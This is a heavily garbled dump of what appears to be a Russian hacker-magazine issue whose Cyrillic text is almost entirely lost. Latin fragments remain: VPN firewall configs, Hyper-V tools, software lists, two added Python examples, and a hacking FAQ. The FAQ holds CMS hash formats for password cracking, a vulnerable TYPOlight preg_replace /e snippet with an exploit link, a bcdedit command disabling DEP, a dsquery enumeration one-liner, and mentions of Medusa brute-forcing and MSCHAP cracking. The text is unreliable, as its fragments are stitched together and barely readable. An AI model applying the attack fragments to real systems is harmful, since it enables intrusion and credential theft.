> cscript hvremote.wsf /remove:synack\user

MMC Windows Firewall, :
> cscript hvremote.wsf /mmc:enable

:
> cscript hvremote.wsf /show /target:computername


Hyper-V Powershell Snap in
(powershellhyperv.codeplex.com)
,
Hyper-V
.
,
Visual Studio.
PowerShell management Library for Hyper-V
(pshyperv.codeplex.com) 80


HVRemote

PowerShell-, , , VM,
, VHD-
VM.
- Hyper-V Web
Manager (HVWM, hvwm.codeplex.com),
Virtualization WMI,
VM,
.
HyperV_Mon (www.
tmurgent.com/tools.aspx)
VM
, . HyperV_Mon
, , VM.
Citrix Systems
IT-,
Citrix Essentials for Hyper-V
Express Edition (deliver.citrix.com/go/citrix/
ehvexpress).
Hyper-V, Fibre Channel
iSCSI .
, ,
SCVMM 2008 (System Center Virtual
Machine Manager, microsoft.com/systemcenter/
virtualmachinemanager),
, Hyper-V,
Microsoft Virtual Server 2005, VMware
ESX/ESXi, .




,
,
. ,

, ,

. z

8.5

DVD

!
660 . !
? ?
.
.
( )




.

2100 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru

1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru


VPN

.
,
VPN , , , . , ,
, .
.
VPN ?
: -
.
,
,
. LAN
,
.
PPPoE PPTP,
host-to-network. , ?
.
PPPoE PPTP :
, *nix.

. Windows PPPoE PPTP
,

.
, , ,
.

OpenVPN,
,
- NAT.
- VPN ,
,


, ,
.
,
. L2TP/
IPsec
,
, ,
,
PPPoE PPTP /
.
VPN,
,
IP, IP ,
,
PPTP,
, OpenVPN L2TP/IPsec,

.
PPPoE PPTP .

PPPOE
PPPoE (Point-to-point protocol
over Ethernet, RFC 2516) ,

.
Windows, *nix
. , PPP

,
.

PADI- (PPPoE
Active Discovery Initiation),
,
IP- ,
PPTP. , ,

, ,
.
,
PPPoE
.

*nix pppoe-discovery,
PADI
, MAC-.
# pppoe-discovery -I eth0
Access-Concentrator: MT-01

.
PPPoE ,
,
/etc/ppp/peers/
dsl-provider:
# nano /etc/ppp/peers/dsl-provider
plugin rp-pppoe.so
rp_pppoe_ac MT-01
eth0
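An added example, not code from the article or from rp-pppoe: the PADI/PADO part of PPPoE discovery (RFC 2516) that pppoe-discovery performs, built and parsed in pure Python so the frame layout and the tags are visible. Every frame is constructed in memory, nothing is sent; the MAC addresses, the AC-Name "MT-01" and the second concentrator in the demo are assumptions.

```python
import os
import struct

ETH_P_PPPOE_DISC = 0x8863            # EtherType of the discovery stage
PADI, PADO, PADR, PADS, PADT = 0x09, 0x07, 0x19, 0x65, 0xa7
TAG_END, TAG_SERVICE_NAME, TAG_AC_NAME = 0x0000, 0x0101, 0x0102
TAG_HOST_UNIQ, TAG_AC_COOKIE = 0x0103, 0x0104
BROADCAST = b'\xff' * 6


def encode_tags(tags):
    """TLV list (type, length, value) closed by an End-Of-List tag."""
    body = b''.join(struct.pack('!HH', t, len(v)) + v for t, v in tags)
    return body + struct.pack('!HH', TAG_END, 0)


def decode_tags(payload):
    tags, off = [], 0
    while off + 4 <= len(payload):
        t, length = struct.unpack_from('!HH', payload, off)
        off += 4
        if t == TAG_END:
            break
        if off + length > len(payload):
            raise ValueError('truncated tag 0x%04x' % t)
        tags.append((t, payload[off:off + length]))
        off += length
    return tags


def build_frame(dst, src, code, session, tags):
    """Ethernet header, then the PPPoE header: ver=1/type=1, code, session, length."""
    payload = encode_tags(tags)
    return (dst + src + struct.pack('!H', ETH_P_PPPOE_DISC)
            + struct.pack('!BBHH', 0x11, code, session, len(payload)) + payload)


def parse_frame(frame):
    if len(frame) < 20:
        raise ValueError('frame too short')
    dst, src = frame[:6], frame[6:12]
    if struct.unpack('!H', frame[12:14])[0] != ETH_P_PPPOE_DISC:
        raise ValueError('not a PPPoE discovery frame')
    vt, code, session, length = struct.unpack('!BBHH', frame[14:20])
    if vt != 0x11:
        raise ValueError('unsupported PPPoE version/type 0x%02x' % vt)
    payload = frame[20:20 + length]
    if len(payload) != length:
        raise ValueError('length field exceeds frame')
    return {'dst': dst, 'src': src, 'code': code, 'session': session,
            'tags': decode_tags(payload)}


def build_padi(host_mac, service=b'', host_uniq=b''):
    """The broadcast the client sends; exactly one Service-Name tag is required."""
    tags = [(TAG_SERVICE_NAME, service)]
    if host_uniq:
        tags.append((TAG_HOST_UNIQ, host_uniq))
    return build_frame(BROADCAST, host_mac, PADI, 0, tags)


def build_pado(ac_mac, host_mac, ac_name, host_uniq=b'', service=b'', cookie=b''):
    """A concentrator's unicast answer: AC-Name, Service-Name, and the client's
    Host-Uniq echoed back unchanged (the RFC requires the echo)."""
    tags = [(TAG_AC_NAME, ac_name), (TAG_SERVICE_NAME, service)]
    if host_uniq:
        tags.append((TAG_HOST_UNIQ, host_uniq))
    if cookie:
        tags.append((TAG_AC_COOKIE, cookie))
    return build_frame(host_mac, ac_mac, PADO, 0, tags)


def discover(frames, host_mac, host_uniq):
    """What pppoe-discovery reports: (AC-Name, MAC) for every PADO answering our
    PADI. PADO carries no authentication, so anything on the segment can reply;
    a second entry here is either another DSLAM or a rogue box answering faster
    than the real one. Replies addressed elsewhere or not echoing our Host-Uniq
    are dropped, as rp-pppoe does."""
    seen = []
    for frame in frames:
        p = parse_frame(frame)
        if p['code'] != PADO or p['dst'] != host_mac:
            continue
        tags = dict(p['tags'])
        if TAG_AC_NAME not in tags or (host_uniq and tags.get(TAG_HOST_UNIQ) != host_uniq):
            continue
        seen.append((tags[TAG_AC_NAME].decode('ascii', 'replace'), p['src']))
    return seen


def demo():
    """Constructed exchange: our PADI, a PADO from MT-01, a PADO from a second
    box that copies the name, and a stale PADO with someone else's Host-Uniq."""
    host = bytes.fromhex('001122334455')
    mt01 = bytes.fromhex('00aabbccddee')
    rogue = bytes.fromhex('00deadbeef00')
    uniq = os.urandom(4)
    padi = build_padi(host, host_uniq=uniq)
    replies = [build_pado(mt01, host, b'MT-01', uniq, cookie=b'\x01\x02'),
               build_pado(rogue, host, b'MT-01', uniq),
               build_pado(rogue, host, b'OTHER', b'stale')]
    return parse_frame(padi), discover(replies, host, uniq)


if __name__ == '__main__':
    padi, acs = demo()
    for name, mac in acs:
        print('Access-Concentrator: %s (%s)' % (name, mac.hex()))
    if len(acs) > 1:
        print('warning: %d concentrators answered the PADI' % len(acs))
```

Because the name in the PADO is whatever the sender chose, rp_pppoe_ac in the peers file only selects among answers; it is the MAC of the concentrator that tells two "MT-01" apart, which is why the demo keeps it.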


: DHCP, DNS . PPPoE

RADIUS. PPPoE . Ethernet, IP- . ,
,
. PPPoE . ,
PPPoE WiFi : .

WiFi Wired LAN, PPPoE .
, MTU.
, Ethernet- 1500 ,
, PPPoE, 1492
( PPPoE 6 PPP Protocol ID 2 ). Path MTU Discovery,
.
ICMP (
3, 4: Fragmentation Needed and DF set, . www.oav.net/mirrors/cidr.html). , - ICMP ,
. MTU . , :
> ping synack.ru -f -l 1464

(-l is the ICMP payload size: on a 1492-byte PPPoE path the largest payload that passes with DF set is 1464 = 1492 - 20 IP - 8 ICMP; -l 1492 builds a 1520-byte packet and fails even on plain Ethernet.)
, . , 1492 .

Windows MTU 1480 ,


.
, ( ) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Ndiswan\Parameters\Protocols\0, REG_DWORD :
ProtocolType 0x00000800;
PPPProtocolType 0x00000021;
ProtocolMTU MTU .

Linux pppd ifconfig. pppd :


# nano /etc/ppp/pppoe.conf
CLAMPMSS=1412

MTU, MSS
(Maximum Segment Size, ),
40 (20 IP 20 TCP),
MTU.
ifconfig MTU :
# ifconfig ppp0 mtu 1400

PPTP PPTP (Point-to-point tunneling


protocol) . PPTP
PPP IP-,


IPSEC
, .

() TCP- ( 1723).
( Generic Routing
Encapsulation, GRE).
PPPoE, PPTP
. , , IP- .
. , ,
,
. , PPTP
Windows (Microsoft
), .
*nix ,
pptp-client (pptpclient.
sf.net),
. MPPE

. MPPE
. , MPPE
Linux 2.6.14,

.
: PAP, CHAP, SPAP, MSCHAP v1 v2,
EAP. /
,
PPTP
. :
LM-, RC4, CHAP, MSCHAP v1
v2 .
asleap (willhackforsushi.com/
Asleap.html) PPTP
MSCHAP . , PPTP,
VPN ( , , ),
.
, PPTP
EAP-TLS (Extensible Authentication
Protocol-Transport Layer Security) . ,
,


NF_CONNTRACK_PPTP
PPTP
. ,
PPTP , VPN .

LAN,
VPN-.

,
VPN ,
.
PPTP
1723/TCP GRE
( 47):
iptables -A INPUT -p tcp -s IP_VPN_ -d _IP --sport 1723 -j ACCEPT
iptables -A INPUT -p gre -s IP_VPN_ -d _IP -j ACCEPT
iptables -A OUTPUT -d IP_VPN_ -s _IP -j ACCEPT

PF ,

(www.xakep.ru/magazine/
xa/109/160/1.asp), PPTP- FreeBSD/mpd
OpenBSD/poptop.

PPTP - NAT
, PPTP
NAT.
VPN .
Linux
ip_nat_pptp, :


THEGREENBOW IPSEC VPN CLIENT

# /sbin/modprobe ip_nat_pptp

. PF . ,
GRE-,
( ) IP-
PPTP
.
, PPTP
IPFW.
:
# vi /etc/rc.conf
firewall_enable="YES"
firewall_nat_enable="YES"
firewall_script="/etc/ipfw.gre"


:

VPN
IP

KVPNC
VPN
*NIX
# vi /etc/ipfw.gre
#!/bin/sh
# with firewall_script set, this file is the whole ruleset: add the pass/deny
# rules you need after the NAT rules, because the built-in rule 65535 denies
# everything unless the kernel was built with IPFIREWALL_DEFAULT_TO_ACCEPT
/sbin/ipfw -q /dev/stdin <<RULES
flush
nat 10 config if fxp0
add 10 nat 10 gre from any to any
add 11 nat 10 tcp from any to any dst-port pptp
add 12 nat 10 tcp from any pptp to any
RULES

/etc/ipfw.gre :
# chmod +x /etc/ipfw.gre

PF PPTP
:
# vi /etc/pf.conf
no nat on $external proto gre all
no nat on $external proto tcp from any \
to any port = pptp
no nat on $external proto tcp from any \
port = pptp to any
pass quick on $external inet proto tcp from any \
to any port 1723
pass quick on $external inet proto tcp from any \
port 1723 to any
pass quick on $external inet proto gre \
from any to any

. PPTP
,
, Frickin PPTP Proxy (frickin.sf.net) pptpproxy
(mgix.com/pptpproxy).
OpenBSD 4.6-current npppd,
PPP L2TP, PPTP PPPoE.

SITE-TO-SITE VPN? .
, .
, ,
. VPN ,
: OpenVPN, L2TP/IPsec, PPTP,

VPN IP, . DNS. TTL , DNS


. IP- VPN-
.
Dynamic
DNS. dyndns.org, dyndns.
dk, no-ip.com. DMOZ dmoz.org/Computers/
Internet/Protocols/DNS/DNS_Providers/Dynamic_DNS

VTun (vtun.sf.net), SSH VPN .


,
: ISA Server (
, X_05_2007), Kerio WinRoute Firewall
(- , X_09_2007), ITC Server
(trafficcontrol.ru) .. ,

site-to-site VPN OpenVPN. .
: Linux, *BSD, Solaris, Mac OS X, Windows
2000. OpenVPN
,
( OpenVPN
, X_04_2007
X_02_2008 ). SSL ,
,
, (

). ,
, NAT
.
IPsec,
, Windows ( XP/2k3SP2 ), *nix.

. IPsec *nix . *BSD
Linux IPsec. Linux
, ,
IPsec: transport mode, IPsec: tunnel mode, IPsec:
BEET mode, IP: AH transformation IP: ESP transformation
IP: IPComp transformation PF_KEY sockets, Networking support Networking options. IPComp (IP Payload
Compression Protocol).
Cryptographic API.

( CPU),
Hardware crypto Devices.
IPsec :
500/UDP ISAKMP (Internet Security Association and Key Management Protocol);
ESP ( 50) Encapsulating Security Payload, ;

INFO

info

PPTP VPN
Win2k8

,
][ 2009 .
PPPoE
PPTP
Linux
PPP
(X_05_2008).
,
OpenSSH,


2008 ,
.


IPSEC
MICROSOFT
AH ( 51) Authentication Header,


.
IPsec 500
AH/ESP.
iptables:

DYNDNS IP

# iptables -A INPUT -p udp --dport 500 -m state --state NEW -j ACCEPT
# iptables -A OUTPUT -p udp --dport 500 -m state --state NEW -j ACCEPT
# iptables -A INPUT -p esp -j ACCEPT
# iptables -A OUTPUT -p esp -j ACCEPT
# iptables -A INPUT -p ah -j ACCEPT
# iptables -A OUTPUT -p ah -j ACCEPT
# with NAT-Traversal (below) 4500/udp has to be open as well


IPsec-tools (ipsec-tools.sf.net).
IPsec , ,
NAT .

NAT-Traversal (NAT-T), ESP UDP (ESPinUDP)
4500/
UDP.
NAT-Traversal,
IPsec.
, , .
DD-WRT (dd-wrt.com),
FreeWRT (freewrt.org), OpenWRT (openwrt.
org), Midge (midge.vlad.org.ua) .
Linux ESPinUDP, NAT-Traversal ipsec.conf:
# /etc/ipsec.conf (Openswan / strongSwan 4.x)
config setup
    nat_traversal=yes

: OPENBSD/ISAKMPD SHREW SOFT VPN CLIENT

NAT-T WinXP, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\IPsec DWORD AssumeUDPEncapsulationContextOnSendRule, IPsec:
0 ( ) IP;
1 - NAT (NAT-T);
2 .
, Microsoft Microsoft IPsec Diagnostic Tool, IPsec- . WinXP/2k3/Vista/2k8.
PPTP IPsec, Windows (Vista SP1, Win7 Win2k8) Microsoft SSTP (Secure Socket Tunneling Protocol, . VPN ][ 2008 ).

, IPsec,
Linux, : strongSwan (strongswan.org) Openswan
(www.openswan.org).
Windows NAT-T
2000/SP3 XP/SP2. -



IPSEC? Windows,
2000,
IPsec,
, .

.
TheGreenBow VPN Client (thegreenbow.com/
vpn.html),
,
-.
D-Link VPN Client IPsec ( 3DES/AES
NAT-T) VPN , D-Link.
, , , ,
KVpnc ( IPsec, IPsec/L2TP, PPTP,
OpenVPN, Cisco, Vtun SSH).
Shrew
Soft VPN Client (shrew.net),
Windows ( 2k Se7en), FreeBSD,
NetBSD, Linux. , IPsec-tools,
OpenSWAN, FreeSWAN, StrongSWAN Isakmpd.

, VPN-
.


. ,

. z

UNITS

lozovsky@gameland.ru

PSYCHO:


:
-


, .
, 1500 . , , . ? !


. ,
? . - , ,

. , - ,

,
, ,
-
.
, , :

.
, , .
, :). ,
.
, - :
(, , ),
?
,
, ?

,
?

? ,
, (,
, .
).
, ,
, . ? ,


,
-. ( )

, . : , .

, :
,
.

,

. .

.

( , -
?). .
, $50
:).

,
,
.
,
Delphi 4 Pascal.
-
. , ,
- ,
,
,
.
,
, ,

,
, .
, , ,
, ,
, ,
:).
(,
), (
, ,
, ,
,
, , ,
) ,
-
.
,
.
.

. ,
,
. ,
.

, ,
. :
1. , .
,
,
, , . .
2.
. ,
?
3.

(
)
,
, .
, ,

,

, .


.


(
,
), (, ,
).
,

, (
,

,
,

..) ,

:
,
,
, ,
, . , ,
. ,
.
, :
,
, , . ,
, ,
? ? ,
.
:
4.
, .
(, ).


.
.
, , - -
. , , ,
.

. MadDoc:
. , ,
-
-, , ,
, , . , ,
-
, ,
.
? ! ,
- . ?
, , , .
.

,
?


,
,
, : I
want you!. ,
, .
,

.

, /

-. .
. , ,
(, -
- ,
), ,
.
1. ,
. ,
-
(),
.
2.
; , .
3. .

, ( )
. ,


,
;). ,
, :
, , , .
, , .
, ,
/, , .
.
.
, , .
(
,
, )
( , ,
..), ,
,
, . , -
: ,

,
. , , ,



, , , , ,
, , ,

:).
, . ,

, , , .


,

:).
, ,

,
.




( ). , , ,
.
, 430 plain texta :).
, .
, 7%
. 38%
, 55% . ,
.
.

, ,
(, ),
. ,
. ,

, ,

, , , , , . ,
,

:), .
. ,
,

. !
][ , .
torrents.ru/rutracker.org !
!

, , . ,
, . , ,
, , , , - , ,

, .
. , , ,

, .
. , ,
,
, , , , ,
, 500
. , , 25
:).

,
,
, , , , . , :
- ,
, , , (-, ).

, .
. , .
, -
,
- :).
, :
, , . -
.
1. .
,
,
,
. ,
. , , ,

. .
.

,
. . , .
,
,
(
)
. :
(, -,
, -


?),
. ,
. ,
, , .
:
, ,
, .
, .
.
.
,
. , ,
,
.
.
, ,
. ,
, . . ,
,

, ,


.
, ,


.
2. .
, , :
, . ? ,
-
,
,
:).
, ,

, ,
. ( ,
), ,
(,
,
. ?),
,
. ? , . :
, ?
: -,
, , , , ,
!. ?
, ?
:
.
, , ,
.
,
.

. ,

,
.


!
, (,
), ,

, , ,
,

, .
,
, . ,

,
,
:
. , ,
.
, .
,
:).
. ,
. ,
, -,
, .
][: , -
-?
..: . , . ,
, .
. ,
. : , , .
, . - :
, .
. , ,
. - .
. ,
- . , ,
, .
][: ! . - -, , . , - ?
.. , , .
: , .
. , ,
, .
: , . , ,
.
, , , .
, ,
. , ,
. ,
. , - .
, ,
, , ,
, , .

. ,
, , , , , .
, , , ,
,
100%
,
. , :). z


UNITS

Step twitter.com/stepah

faq
united
@real.xakep.ru

Q:

phpmyadmin-2.11.9.2 295 / 299 (98.66%)

). ?

CMS -

phpmyadmin-2.11.9.4 295 / 299 (98.66%)

A: vB

(fingerprinting)?

phpmyadmin-2.11.8.1 295 / 299 (98.66%)

A:

phpmyadmin-2.11.9.5 295 / 299 (98.66%)

Ruby
SQLite3 DB wafp (Web Application Finger
Printer).
:
1. -
, - CMS (,
javascript-, );
2. md5-
;
3. CMS.
phpMyAdmin (
/themes/darkblue_orange/img/b_info.png
):

phpmyadmin-2.11.8

:
1. ;
2.
;
3.
.

wafp.rb --verbose -p phpmyadmin https://phpmyadmin.example.de
VERBOSE: request for "/themes/darkblue_orange/img/b_info.png" produced "Connection refused - connect(2)" for 1 times - retrying

295 / 299 (98.66%)

phpmyadmin-2.11.9.3 295 / 299 (98.66%)


phpmyadmin-2.11.9

295 / 299 (98.66%)

phpmyadmin-2.11.4

294 / 299 (98.33%)

phpmyadmin-2.11.5.2 294 / 299 (98.33%)


+-----------------------------------+
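An added example, not code from the answer or from wafp: the matching step the answer describes, reduced to Python. A fingerprint database maps each known version to the MD5 of its static files; the target's files are hashed and every version is scored by how many hashes agree, reported the way wafp prints it (version, matched / total, percentage). The database and the "site" are constructed in-memory stand-ins; a real run would fetch the paths over HTTP.

```python
import hashlib


def md5hex(data):
    return hashlib.md5(data).hexdigest()


# Constructed fingerprint DB: version -> {path: md5 of that file in that release}
FINGERPRINTS = {
    'app-2.11.8': {'/img/b_info.png': md5hex(b'png-A'),
                   '/js/common.js': md5hex(b'js-1'),
                   '/css/theme.css': md5hex(b'css-1'),
                   '/ChangeLog': md5hex(b'2.11.8')},
    'app-2.11.9': {'/img/b_info.png': md5hex(b'png-A'),
                   '/js/common.js': md5hex(b'js-1'),
                   '/css/theme.css': md5hex(b'css-2'),
                   '/ChangeLog': md5hex(b'2.11.9')},
    'app-2.11.9.1': {'/img/b_info.png': md5hex(b'png-A'),
                     '/js/common.js': md5hex(b'js-2'),
                     '/css/theme.css': md5hex(b'css-2'),
                     '/ChangeLog': md5hex(b'2.11.9.1')},
}


def fetch_all(fetch, paths):
    """Hash each static path on the target. `fetch(path)` returns the body as
    bytes, or None for a 404 / refused connection; a missing file never matches."""
    hashes = {}
    for path in paths:
        body = fetch(path)
        if body is not None:
            hashes[path] = md5hex(body)
    return hashes


def score(target_hashes, db):
    """(version, matched, total, pct) for every version, best match first. Ties
    keep the database order, which is why wafp cannot separate releases whose
    static files did not change (the block of equal 98.66% hits in the answer)."""
    rows = []
    for version, files in db.items():
        matched = sum(1 for p, h in files.items() if target_hashes.get(p) == h)
        rows.append((version, matched, len(files), round(100.0 * matched / len(files), 2)))
    rows.sort(key=lambda r: r[1], reverse=True)
    return rows


def fingerprint(fetch, db=FINGERPRINTS, limit=10):
    """Collect every path any version knows, hash what the target serves, rank."""
    paths = sorted({p for files in db.values() for p in files})
    return score(fetch_all(fetch, paths), db)[:limit]


def demo_site():
    """Constructed target: a 2.11.9 install whose ChangeLog has been deleted.
    Removing such version-bearing files is what blunts this technique."""
    files = {'/img/b_info.png': b'png-A', '/js/common.js': b'js-1',
             '/css/theme.css': b'css-2'}
    return lambda path: files.get(path)


if __name__ == '__main__':
    for version, matched, total, pct in fingerprint(demo_site()):
        print('%-16s %d / %d (%.2f%%)' % (version, matched, total, pct))
```

The ranking only tells you which release the served files resemble most; a site that strips images, scripts and changelogs from the web root, or rewrites them, scores every version the same and gives the scanner nothing to go on.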

Q: ,

CMS?


www.mytty.org/
wafp.
(
),
http://sucuri.net/?page=docs&title=webappversion-detection.
CMS, (
)
WordPress . ,
Joomla Vulnerability Scanner
OWASP (www.owasp.org/index.
php/Category:OWASP_Joomla_Vulnerability_
Scanner_Project) CMS
Drupal Raz0r' (raz0r.name/drupalscan/).

found the following matches (limited to


10):

Q: , vBulletin

+------------------------------------+

phpmyadmin-2.11.9.1 296 / 299 (98.99%)


A: , , itdefence.ru/dbitems.
: .
,
PasswordsPro (www.insidepro.com/eng/
passwordspro.shtml).
,
forum.
insidepro.com.
Q: php-?
A: php-

( error_reporting
E_ALL) echo/print
( http://phpfaq.
ru/debug).
!

Expert Debugger (phpexperteditor.com),

CMS

PUNBB 1.2.X
QUICKSILVER FORUM
REFBASE (WEB REFERENCE DATABASE)
RUNCMS
SCRIPTEEN FREE IMAGE HOSTING SCRIPT
SHINOBU
SILVERSTRIPE
SLAED CMS
SMF 1.1.X
SMALLNUKE 2
SNEWS
SNITZ FORUMS 2000
TANGOCMS
TIKI WIKI
TINYPUG
TRIBIQ
TRITON CMS
USEBB
VANILLA
VBULLETIN 2.16
VBULLETIN 3.54
VIKINGBOARD
VOODOO CHAT
W-AGORA
WEBSITE BAKER
WORDPRESS <=2.3.3
WORDPRESS >=2.5

MD5($PASS) SHA-1


PHP Expert Editor.
DBG PHP Debugger,
IDE
.
:
PHP
;
breakpoints;
;
;
UTF-8;
profile;
IDE;
;

www.ankord.com.
Q:
ICQ-?
A: ICQ

Monitor (http://avtuh.ru/2009/11/27/icq-monitor.
html),
ICQ- (//).

(
)
. ,
QIP
:)
Q: FAQ
CMS .
?

DES(PASSWORD, $SALT) $SALT = SUBSTR(EMAIL, 0, 2)


SHA1($USERNAME.$PASS) MD5($PASS)
MD5($PASS)

SHA1($USERNAME.$PASS)
MD5($PASS)

SHA-256

MD5($PASS)

"\\1")',

);
$strArticle = preg_
replace($arrSearch, $arrReplace,
$strArticle);

,


. ,
,
http://snipper.ru/
view/6/typolight-270-php-code-executionexploit.
Q: ,

MD5(MD5($PASS).$SALT)

MD5($PASS)

MD5($PHPBB3)

A: (WordPress, Drupal Joomla!),


, ,
CMS 10 .
,
.
,
.
, PHP
TYPOlight.
e ( ,
php-,

phpBB2) preg_replace():

-
?
A: ( http- ),
-
http://exploit.in/tools/anonym.php.
:
IP;
User agent ;
Hostname;
;
JavaScript: ;
( JavaScript);
-;
;

;
;
;
( IE).
JavaScript.
js
,
OS. ,
Google Analytics Piwik (www.piwik.org).

Q: 3-./system/libraries/Controller.php
protected function
printArticleAsPdf(Database_Result
$objArticle)
{
$strArticle = preg_
replace('/\?pdf=[0-9]*/i', '',
$strArticle);
$arrSearch = array
(
'@(<pre.*</pre>)@Use',

);
$arrReplace = array
(
'str_replace("\n", "<br />",

.
.
A:
http://3character.com, 3- ,
.
(, , ,
):

OMG.com, $80.000, 8/20/2009, Sedo.


com;
AMT.com, $100.000, 4/28/2007, Sedo.
com;
NHS.com, $151.300, 2/21/2006,


Moniker.com;
SEX.com, $12.000.000, 1/25/2006,
Private Transaction.

, ,
:)
Q: .

,
,
.
: AFP, CVS, FTP, HTTP,
IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP,
PcAnywhere, POP3, PostgreSQL, rexec, rlogin,
rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2,
SVN, Telnet, VmAuthd, VNC.

,
. ,

,
, , ,
.
Q: -
(

LLLL, CCCC .. ?

Q: , DEP -

, ).

A: -

, ,

. .
, :
L - ;
N - ;
S - ;
C - ;
V - .

:
1. - (A, E, I, C, S, P, M, D, T);
2. (A, B, C, D, E, F, G, H, I, L, M, N, O, P,
R, S, T);
3. (J, K, U, V, W);
4. (Q, X, Y, Z).

A: DEP, , -

HTML-

Data Execution Prevention.


, ,
.
DEP
->
.

. ,
- .
,
DEP .
: bcdedit.exe /set {current} nx AlwaysOff.
.

Q: ,
Jimm.
?
A:

www.icq.com/password , ,
(

:).
, :
1. forum.asechka.ru
ICQ Password Recalling (IPR) karas3d;
2.
Jimm IP 127.0.0.1 ;
3. .
UIN
.
:
1. http://forum.motofan.ru/index.
php?showtopic=147890 Jimm
ICQ Password Recovery;
2. , Open .rms Jimm;
3. Scan ,
.
.rms ,
motofan.ru
.
Q: THC-Hydra, , ,
( , ).
, -

Q: , ?
A: ,
,
.
lsass.exe , .
Metasploit'
(relentless-coding.blogspot.com/2010/02/
windows-vista-7-targets-for-screen.html).

scripts/meterpreter Metasploit'. , ,
, ,
.

Q:
?
A: , .
:

cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i & set name=!name:~4! & , !name!

?
A: Medusa (www.
foofus.net/jmk/medusa/medusa.html), 2.0.
-


,
dsquery ,

A: Ruby
iScanner (iscanner.isecur1ty.org).

iframe',
javascript, vbscript activex.
Q: , ,
(][
Userlevel! .
), ,
BSOD.
?
A: , -

,
TDSS ( Tidserv, TDL3
Alureon). . ,
(, ,
Vista, Windows 7). TDSS cleaning tool (www.norman.
com/support/support_tools/77201/en).
Q: Linux'
,
Bluetooth, (
) ?
A: PAM (Pluggable
Authentication Modules),
API-
. : ,

Bluetooth (
),
pam_blue (packages.gentoo.org/
package/sys-auth/pam_blue).
:
pam_usb (pamusb.org)
USB-;
pam_fprint (reactivated.net/fprint/wiki/Pam_
fprint) ;
pam-face-authentication (code.google.
com/p/pam-face-authentication) -.

,

. z

>Net
Ad Muncher 4.81
Angry IP Scanner 3.0 Beta 4
ApexDC++ 1.3.0
CrossLoop 2.71
DNSBench
Halite 0.3.2.2

>Multimedia
Bullzip PDF Printer 7.1
Hornil StylePix 1.3.0
IOGraph 0.9
MediaInfo 0.7.28
Nuance PDF Reader 6
Picasa for Windows 3.6.0
ProgDVB v6.32.7
Screensaver Player 3.0
Sqirlz Morph 2.1
STDU Viewer 1.5.382
UVScreenCamera v4.4 beta
VSO Image Resizer 3.0
webcamXP 5 5.5

>Misc
Acer Gridvista 2.72.317
AM-DeadLink 4.0
BossMode 1.0
EverNote 3.5.2
File Association Fixer 1.0
Flexcrypt 3.3.0
Freeraser
LockHunter 1.0 Beta 3
Microsoft Keyboard Layout Creator 1.4
Mozilla Prism for Windows 1.0 Beta 3
MyEventViewer 1.25
MyPhoneExplorer 1.7.5
PeaZip 3.0
Polyglot 3000 3.44
Prio - Priority Saver 1.99
ProcessQuickLink
QTTabBar 1.2.3b5
RegScanner 1.80
TranslateIt! 8.0
WinDirStat 1.1.2
Windows Access Panel for Windows
7 & Vista

>>WINDOWS
>>Development
CollabNet Subversion 1.6.9
Database .NET 3.1.3712
Dependency Walker 2.2
EmEditor Professional 9.15
HiAsm 4.3
IncrediBuild 3.50
PatchFactory 3.3
Selenium 1.0.5
SQLiteStudio 1.1.3
SQLyog Community Edition 8.22
Syser Kernel Debugger 1.99.1900
Titanium Developer
VisualSVN 1.7.7
VisualSVN Server 2.1.1
WinHex 15.6
wyBuild 2.5

>>UNIX
>Desktop
Amarok 2.2.2
Anki 0.9.9.8.6
BashStyle-NG 7.9.1
BRL-CAD 7.16.4
Darktable 0.4
DeaDBeeF 0.3.2
DeVeDe 3.15.2
DjVuSmooth 0.2.2
Double Commander 0.4.5
Epidermis 0.5
gCAD3D 1.42
GRAMPS 3.1.3
Midnight Commander 4.7.0.2
NtEd 1.9.16

>System
Allmyapps
AnVir Task Manager
Bonkey for Windows
CPU-Z 1.53.5 Beta
Default Programs Editor 2.6
Defraggler 1.17
Driver Sweeper 2.1.0
DriverMax 5.5
Gizmo Central 2.7.7
HDDScan 3.2
Index Your Files 5.0
Ketarin 1.1.0
MONyog MySQL Monitor and Advisor
3.7.2
MySQL Community Server 5.1.44
Outpost Firewall Pro 2009
Panda Cloud Antivirus Free Edition
1.0.1
PostgreSQL 8.4.2
Quicksys RegDefrag 2.8
SIW 2010 (build 0210)
SUMo 2.7.5.86

>Security
BSQLHackerSetup 0909
DECAF 2.01
Heyoka 0.1.3
Imposter 0.9
John the Ripper 1.7.5
keimpx 0.2
LookInMyPC 2.0
Nessus 4.2.1
PenTBox 1.3.1
Sahi V3
Watcher 1.3.0
WebRaider 0.2.3.8
Websecurify 0.5RC1
WinFail2ban 0.1

MailBrowser 1.76
Opera 10.50
Seesmic for Windows 0.6
Skype 4.2
uTorrent 2.0
VisualRoute 2010 for Windows 14.0b
Wi-Fi Inspector 1.0.1
Wireshark for Windows 1.3.3

>Security
Browser Fuzzer 3
Burp Suite 1.3
FingerPrintFucker
GreenSQL 1.2.2
Groundspeed 1.1
Honeyd 1.5c

>Net
BitchX 1.1
Bitflu 0.97
EZ Intranet Messenger 1.2.4
FileZilla Client 3.3.2
gnetworktester 0.11
gWakeOnLan 0.5
I2P 0.7.11
Ipaudit 0.95
Midori 0.2.3
Mozilla Firefox 3.0.18
Nagstamon 0.9.2
Opera 10.10
Pidgin 2.6.6
Pino 0.2.0
SABnzbd 0.5.0
SeaMonkey 2.0.3
Sylpheed 3.0
Synchrorep 1.4.1
ZNC 0.080

>Games
Freeciv 2.2.0

>Devel
Ald 0.1.7
Autoconf Macro Archive
Code Browser 3.16
CodeInvestigator 0.22.1
crpcut 1.0.2
DreamPie 1.0
FireQuery 0.6
Git 1.7.0
itools 0.60.8
MoSync 2.3
Opera Dragonfly Alpha
Oracle Enterprise Pack for Eclipse
11g 11.1.1.4
ParseIRC 1.16
Picket 0.2.1
Rhodes 1.4
Seed7
Simple Sockets 1.4.0
SVN Access Manager 0.4.1.6
Trad4 3.1
UMLet 10.4

OpenOffice.org 3.2
OpenShot 1.0
QGIS 1.4
